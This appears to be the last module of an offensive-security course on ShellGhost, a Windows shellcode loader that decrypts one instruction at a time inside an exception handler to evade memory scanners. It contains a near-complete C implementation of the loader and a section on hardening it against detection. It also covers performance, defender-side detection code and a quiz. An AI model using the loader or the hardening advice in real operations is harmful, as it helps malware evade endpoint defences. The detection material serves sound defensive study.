Difficulty: Advanced

Module 8: Full Chain, Performance & Detection

The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.

Module Objective

This final module consolidates everything into a complete end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors that defenders can use to identify ShellGhost, and compares it against alternative memory evasion techniques like sleep encryption and module stomping. You will leave this module with a complete understanding of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.

1. Complete Execution Flow

Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:

ShellGhost End-to-End Pipeline

1. Preprocess: mapping.py
2. Compile: Encrypted data + map
3. Alloc RW: Fill with 0xCC
4. Register VEH: First = 1
5. CreateThread: .text end entry
6. BP Loop: Per-instruction
7. Cleanup: Remove VEH, free

// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>

// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;
    DWORD quota;
} CRYPT_BYTES_QUOTA;

typedef NTSTATUS (WINAPI *_SystemFunction032)(
    PUNICODE_STRING, PUNICODE_STRING);

// ============ Global State ============
static struct {
    PBYTE exec_base;
    SIZE_T exec_size;
    PBYTE enc_sc;          // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size;
    CRYPT_BYTES_QUOTA *map;
    DWORD num_instr;
    DWORD current_index;
    INT prev_index;
    BYTE key[16];
    USHORT key_len;
    _SystemFunction032 pSF032;
} G;

// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD r = ep->ExceptionRecord;
    PCONTEXT c = ep->ContextRecord;
    DWORD old;

    if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already adjusted by kernel (no -1 needed)
        PBYTE addr = (PBYTE)c->Rip;
        if (addr < G.exec_base ||
            addr >= G.exec_base + G.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_READWRITE, &old);

        // Re-mask previous instruction with 0xCC (its ciphertext stays in enc_sc)
        if (G.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
            memset(G.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
        memcpy(G.exec_base + curr->rva,
               G.enc_sc + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(G.exec_base + curr->rva) };
        UNICODE_STRING key = {
            G.key_len, G.key_len, (PWSTR)G.key };
        G.pSF032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_EXECUTE_READ, &old);

        G.prev_index = G.current_index;
        G.current_index++;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

// ============ Main ============
void ShellGhostRun(
    PBYTE enc_sc, SIZE_T sc_size,       // From mapping.py
    CRYPT_BYTES_QUOTA *map, DWORD n_instr,
    PBYTE key, USHORT key_len
) {
    // 1. Store references
    G.enc_sc = enc_sc;
    G.sc_size = sc_size;
    G.map = map;
    G.num_instr = n_instr;
    memcpy(G.key, key, key_len);
    G.key_len = key_len;
    G.prev_index = -1;
    G.current_index = 0;

    // 2. Resolve SystemFunction032
    G.pSF032 = (_SystemFunction032)GetProcAddress(
        LoadLibraryA("advapi32.dll"), "SystemFunction032");

    // 3. Allocate RW buffer filled with 0xCC
    G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(G.exec_base, 0xCC, sc_size);
    G.exec_size = sc_size;

    // 4. Register VEH handler
    PVOID h = AddVectoredExceptionHandler(1, Handler);

    // 5. Create thread at end of .text segment
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    RemoveVectoredExceptionHandler(h);
    VirtualFree(G.exec_base, 0, MEM_RELEASE);
}

2. Performance Impact Analysis

ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.

Exception Overhead Breakdown

| Operation | Approximate Cost | Frequency |
|---|---|---|
| Kernel trap (INT3) | ~1,000-5,000 cycles | Once per instruction |
| Context save to KTRAP_FRAME | ~500-1,000 cycles | Once per instruction |
| User-mode dispatch (KiUserExceptionDispatcher) | ~2,000-5,000 cycles | Once per instruction |
| VEH handler lookup + call | ~100-500 cycles | Once per instruction |
| SystemFunction032 decrypt | ~50-200 cycles | Once per instruction |
| VirtualProtect RW↔RX toggle | ~1,000-3,000 cycles | Twice per instruction (RX→RW, then RW→RX) |
| Memory write (re-encrypt + decrypt) | ~10-100 cycles | Once per instruction |
| NtContinue (restore CONTEXT) | ~2,000-5,000 cycles | Once per instruction |

Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles (the table rows sum to about 7,700 to 22,800 when VirtualProtect is counted twice). A typical instruction executes in 1-5 cycles natively, so ShellGhost imposes a slowdown of roughly 1,500x to 20,000x (7,000 / 5 ≈ 1,400 at the low end, 20,000 / 1 at the high end). Because the one-exception model uses only a breakpoint and no single-step, it incurs approximately half the exception overhead of a two-exception approach.
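
The arithmetic behind these ranges can be checked with a short sketch. The C below is illustrative only: the `CostRow` type and the `total_cycles` and `slowdown` helpers are names introduced here, and the cycle figures are copied from the table above, not measured.

```c
#include <stddef.h>

/* One row of the overhead table: a cycle range and how many times
   the operation occurs per shellcode instruction. */
typedef struct {
    const char *name;
    unsigned lo_cycles;
    unsigned hi_cycles;
    unsigned times_per_instr;
} CostRow;

/* Figures taken from the table in this section (estimates, not measurements). */
static const CostRow kRows[] = {
    {"Kernel trap (INT3)",          1000, 5000, 1},
    {"Context save to KTRAP_FRAME",  500, 1000, 1},
    {"User-mode dispatch",          2000, 5000, 1},
    {"VEH handler lookup + call",    100,  500, 1},
    {"SystemFunction032 decrypt",     50,  200, 1},
    {"VirtualProtect toggle",       1000, 3000, 2},
    {"Memory write",                  10,  100, 1},
    {"NtContinue",                  2000, 5000, 1},
};

/* Sum the low (use_high == 0) or high (use_high != 0) end of every row,
   weighted by how often the operation runs per instruction. */
unsigned total_cycles(int use_high)
{
    unsigned total = 0;
    for (size_t i = 0; i < sizeof(kRows) / sizeof(kRows[0]); i++) {
        unsigned c = use_high ? kRows[i].hi_cycles : kRows[i].lo_cycles;
        total += c * kRows[i].times_per_instr;
    }
    return total;
}

/* Slowdown factor: overhead cycles divided by native cycles per instruction. */
double slowdown(unsigned overhead_cycles, unsigned native_cycles)
{
    return (double)overhead_cycles / (double)native_cycles;
}
```

Under these assumptions `total_cycles(0)` gives 7,660 and `total_cycles(1)` gives 22,800, which the text rounds to 7,000 and 20,000. `slowdown(7000, 5)` is 1,400 and `slowdown(20000, 1)` is 20,000, matching the quoted range.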

Practical Impact

| Shellcode Type | Native Execution | ShellGhost Execution | Verdict |
|---|---|---|---|
| Stager (small, network setup) | <1 ms | ~50-200 ms | Acceptable for a stager payload |
| Stageless beacon (~200KB) | ~1 ms | ~5-30 seconds for initial setup | Noticeable delay but usually tolerable |
| Continuous C2 loop | Real-time | Significant latency per iteration | ShellGhost is best for initialization, not continuous operation |
| Compute-heavy shellcode | Varies | Extremely slow | Not suitable for compute-bound payloads |

Mitigation: Hybrid Approach

ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.

3. Detection Vectors

While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:

| Detection Vector | Observable Indicator | Detection Method | Difficulty |
|---|---|---|---|
| VEH Registration | AddVectoredExceptionHandler API call | User-mode API hook on AddVectoredExceptionHandler (kernel32) or RtlAddVectoredExceptionHandler (ntdll); registration makes no system call, so kernel-side telemetry does not observe it directly | Easy |
| Excessive Exceptions | Thousands of EXCEPTION_BREAKPOINT per second | Performance counters, ETW exception events, kernel callbacks | Medium |
| RW/RX Memory Toggling | Frequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READ | API hook on VirtualProtect, ETW memory protection events | Medium |
| 0xCC-Filled Memory | A memory region containing almost entirely 0xCC bytes | Heuristic scan for homogeneous INT3 regions | Medium |
| VEH Handler List Inspection | Non-standard VEH handlers registered in the process | Walking ntdll!LdrpVectorHandlerList | Medium |
| Thread Entry Point | Thread with entry point in the .text segment (at null bytes near the end) | Thread creation monitoring, unusual start address analysis | Hard |
| KiUserExceptionDispatcher Frequency | Extremely high rate of user-mode exception dispatch | Hooking KiUserExceptionDispatcher or monitoring debug events | Medium |
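
The "0xCC-Filled Memory" heuristic from the table can be sketched in portable C. This is a minimal illustration, not a production scanner: `int3_fraction` and `looks_like_int3_fill` are hypothetical names, and the `min_len` and `threshold` parameters are assumed tuning knobs. A sensor would first have to copy the region's bytes out of the target process.

```c
#include <stddef.h>
#include <stdint.h>

/* Fraction of bytes in buf that equal 0xCC (the INT3 opcode).
   Returns 0.0 for an empty buffer. */
double int3_fraction(const uint8_t *buf, size_t len)
{
    if (len == 0) {
        return 0.0;
    }
    size_t hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0xCC) {
            hits++;
        }
    }
    return (double)hits / (double)len;
}

/* Returns 1 when the region is at least min_len bytes long and its
   0xCC fraction is at or above threshold, otherwise 0.
   min_len and threshold are assumptions to be tuned per environment. */
int looks_like_int3_fill(const uint8_t *buf, size_t len,
                         size_t min_len, double threshold)
{
    if (len < min_len) {
        return 0;
    }
    return int3_fraction(buf, len) >= threshold;
}
```

The minimum length matters because short 0xCC runs are normal: some compilers pad the gaps between functions with INT3 bytes. A reasonable starting point is to apply the check only to private, committed regions that are large enough to hold a payload.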

4. Detection Deep Dive: VEH Registration Monitoring

// Defender perspective: detecting VEH handler registration
#include <windows.h>

// Placeholders for the sensor's own logging routines (not Windows APIs)
void LogEvent(const char *fmt, ...);
void AlertEvent(const char *msg);

// Method 1: Hook AddVectoredExceptionHandler
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;  // Set by the hooking framework when the hook is installed

PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
    // Log the registration
    LogEvent("VEH handler registered: First=%lu, Handler=%p",
             First, (void *)Handler);

    // Check if the handler address is in a suspicious region.
    // VirtualQuery returns 0 on failure, in which case mbi is not valid.
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQuery((LPCVOID)Handler, &mbi, sizeof(mbi)) != 0 &&
        mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
        AlertEvent("VEH handler in private memory (potential shellcode)");
    }

    return OriginalAddVEH(First, Handler);
}

// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList

5. Detection Deep Dive: Exception Rate Monitoring

// Defender perspective: detecting excessive exception rates
// Using Windows Performance Counters or ETW

// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second

// ETW-based detection:
// Provider: Microsoft-Windows-Kernel-Audit-API-Calls
// Events: Exception dispatch events
// Threshold: Alert if > 1000 exceptions/second sustained

Exception Rate as an IoC

A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every shellcode instruction, and a typical payload might execute tens of thousands of instructions during initialization alone. The resulting exception rate is orders of magnitude above normal, making it a strong Indicator of Compromise (IoC) for behavioral detection. ShellGhost's one-exception model generates half as many exceptions as a two-exception (breakpoint + single-step) approach, but this is still far above baseline.
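
A rate threshold like the one described above can be sketched as a fixed-window counter. The code below is a simplified illustration under stated assumptions: `RateMonitor`, `rate_monitor_init`, and `rate_monitor_record` are hypothetical names, timestamps are assumed to come from a monotonic millisecond clock, and how the sensor observes each exception is out of scope.

```c
#include <stdint.h>

/* Counts events inside a fixed-length window and reports when the
   count exceeds a threshold. */
typedef struct {
    uint64_t window_start_ms;  /* start time of the current window */
    uint32_t window_ms;        /* window length in milliseconds */
    uint32_t threshold;        /* events per window tolerated before alerting */
    uint32_t count;            /* events seen in the current window */
} RateMonitor;

void rate_monitor_init(RateMonitor *m, uint32_t threshold, uint32_t window_ms)
{
    m->window_start_ms = 0;
    m->window_ms = window_ms;
    m->threshold = threshold;
    m->count = 0;
}

/* Record one exception observed at now_ms (assumed non-decreasing).
   Returns 1 if the current window now holds more than threshold events. */
int rate_monitor_record(RateMonitor *m, uint64_t now_ms)
{
    if (now_ms - m->window_start_ms >= m->window_ms) {
        /* The previous window has elapsed: start a new one at this event. */
        m->window_start_ms = now_ms;
        m->count = 0;
    }
    m->count++;
    return m->count > m->threshold;
}
```

With `rate_monitor_init(&m, 1000, 1000)` the monitor tolerates 1,000 exceptions in a one-second window and fires on the next one. To match the "sustained" wording of the threshold, a sensor would likely require several consecutive windows to fire before alerting, which cuts false positives from short bursts.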

6. Comparison with Other Memory Evasion Techniques

| Technique | Decryption Surface | Performance | Detection Difficulty | Complexity |
|---|---|---|---|---|
| Sleep Encryption (Ekko) | Full payload during active phase | Minimal (native speed when active) | Medium (timer objects, VirtualProtect pattern) | Medium |
| Foliage | Full payload during active phase | Minimal (APC-based timer) | Medium (APC queue monitoring) | Medium-High |
| Module Stomping | Full payload (but appears backed by DLL) | Native speed | Medium (.text section hash mismatch) | Low-Medium |
| Page Guard Toggling | One page (4KB) | Moderate (one exception per page) | Medium (VirtualProtect frequency) | Medium |
| ShellGhost | 1 instruction (~1-15 bytes) | Very slow (1 exception + 2 VirtualProtect per instruction) | Medium (exception rate, VEH registration, RW/RX toggling) | High |
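
The "Decryption Surface" column can be put in numbers with a small sketch. The helper names `exposed_bytes` and `exposed_fraction` are introduced here for illustration. The unit sizes are the ones in the table: the whole payload, one 4 KB page, or one instruction of at most 15 bytes.

```c
#include <stddef.h>

/* Largest number of plaintext payload bytes resident at once:
   the decryption unit, capped at the payload size. */
size_t exposed_bytes(size_t payload_size, size_t unit_size)
{
    return unit_size < payload_size ? unit_size : payload_size;
}

/* Same quantity as a fraction of the payload (0.0 for an empty payload). */
double exposed_fraction(size_t payload_size, size_t unit_size)
{
    if (payload_size == 0) {
        return 0.0;
    }
    return (double)exposed_bytes(payload_size, unit_size) / (double)payload_size;
}
```

For a 200 KB payload (204,800 bytes), a full-payload technique exposes 100% of the bytes while active, page-level toggling exposes 4,096 bytes (2%), and per-instruction decryption exposes at most 15 bytes (under 0.01%).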

When to Use ShellGhost

7. Hardening ShellGhost

Several modifications can make ShellGhost more resistant to the detection vectors identified above:

Reducing Observable Indicators

| Detection Vector | Hardening Approach |
|---|---|
| RW/RX toggling frequency | ShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead). |
| VEH registration | Direct syscalls do not apply here: AddVectoredExceptionHandler forwards to ntdll!RtlAddVectoredExceptionHandler, which runs entirely in user mode and has no Nt* system call counterpart, so a hook on the ntdll routine still observes the registration. |
| 0xCC-filled region | Fill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction. |
| Exception rate | Add artificial delays between instructions to reduce exception frequency (further reduces performance) |
| VEH list inspection | Encode the handler pointer manually using the same scheme as RtlEncodePointer |

8. Course Summary

What You Have Learned

| Module | Topic | Key Concept |
|---|---|---|
| 1 | Memory Scanner Evasion | Full decryption creates a detectable window; minimal decryption surface is the goal |
| 2 | Software Breakpoints | INT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003) |
| 3 | Vectored Exception Handling | VEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority |
| 4 | The ShellGhost Concept | One-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one |
| 5 | SystemFunction032 & Shellcode Mapping | Python preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4 |
| 6 | VEH Handler Implementation | ContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect |
| 7 | Background: Trap Flag & Single-Stepping | General x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost) |
| 8 | Full Chain & Detection | ~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling |

The Core Innovation

ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that keeps at most one decrypted instruction in memory at a time, which defeats signature-based memory scanning while avoiding common IoCs like RWX memory and thread entry in private memory. The cost is the behavioral footprint and slowdown cataloged above. This trade-off is compelling for scenarios where stealth matters more than performance, particularly for initial-stage execution.

Knowledge Check

Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?

A) 2-5x slower
B) 10-100x slower
C) 1,500-20,000x slower (due to kernel transition + VirtualProtect per instruction)
D) No measurable difference

Q2: Which detection vector is most straightforward for defenders to monitor?

A) RC4 keystream bias analysis
B) AddVectoredExceptionHandler API call combined with high EXCEPTION_BREAKPOINT rate
C) Scanning for 0xCC bytes in all memory regions
D) Monitoring CPU temperature for exception overhead

Q3: What is the recommended use case for ShellGhost in a real operation?

A) As a stager or initialization mechanism that transitions to native execution after setup
B) For continuous C2 beacon communication
C) For compute-intensive post-exploitation tasks
D) As a replacement for all shellcode loaders